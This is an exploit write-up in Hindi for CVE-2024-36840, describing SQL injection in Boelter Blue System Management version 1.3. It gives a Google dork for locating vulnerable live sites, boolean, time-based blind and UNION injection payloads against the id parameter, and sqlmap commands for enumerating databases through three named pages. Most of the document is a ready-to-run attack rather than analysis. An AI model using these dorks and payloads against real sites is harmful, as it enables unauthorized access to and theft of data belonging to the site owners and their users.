
# CVE-2024-36840 के लिए एक्सप्लॉइट: Boelter Blue System Management में SQL इंजेक्शन भेद्यता (संस्करण 1.3)
एक्सप्लॉइट शीर्षक: बोएल्टर ब्लू सिस्टम मैनेजमेंट (संस्करण 1.3) में SQL इंजेक्शन भेद्यता
मूल Google Dork: inurl:"Powered by Boelter Blue" (काम नहीं किया (खोज में शून्य URL))
Theexploiters द्वारा Google Dork: intext:"Powered by Boelter Blue" (काम कर रहा है)
दिनांक: 2024-06-04
एक्सप्लॉइट लेखक: CBKB (DeadlyData, R4d1x)
विक्रेता होमपेज: Boelter Blue
सॉफ्टवेयर लिंक: Google Play Store
संस्करण: 1.3
परीक्षण किया गया: Linux Debian 9 (stretch), Apache 2.4.25, MySQL >= 5.0.12
CVE: CVE-2024-36840
बोएल्टर ब्लू सिस्टम मैनेजमेंट (संस्करण 1.3) में कई SQL इंजेक्शन भेद्यताओं की पहचान की गई है। ये भेद्यताएं हमलावरों को विभिन्न मापदंडों के माध्यम से मनमाने SQL कमांड इंजेक्ट करने और निष्पादित करने की अनुमति देती हैं। सफल शोषण के परिणामस्वरूप अनधिकृत पहुंच, डेटा बहिर्गमन और संभावित खाता अधिग्रहण हो सकता है।
पैरामीटर: id (GET)
id=10071 AND 4036=4036प्रकार: समय-आधारित ब्लाइंड
id=10071 AND (SELECT 4443 FROM (SELECT(SLEEP(5)))LjOd)प्रकार: UNION क्वेरी
id=-5819 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7170766b71,0x646655514b72686177544968656d6e414e4678595a666f77447a57515750476751524f5941496b55,0x7162626a71),NULL,...news_details.php?id
https://www.example.com/news_details.php?id=10071sqlmap -u "https://www.example.com/news_details.php?id=10071" --random-agent --dbms=mysql --threads=4 --dbs
services.php?section
https://www.example.com/services.php?section=5081sqlmap -u "https://www.example.com/services.php?section=5081" --random-agent --tamper=space2comment --threads=8 --dbs
location_details.php?id
https://www.example.com/location_details.php?id=836sqlmap -u "https://www.example.com/location_details.php?id=836" --random-agent --dbms=mysql --dbs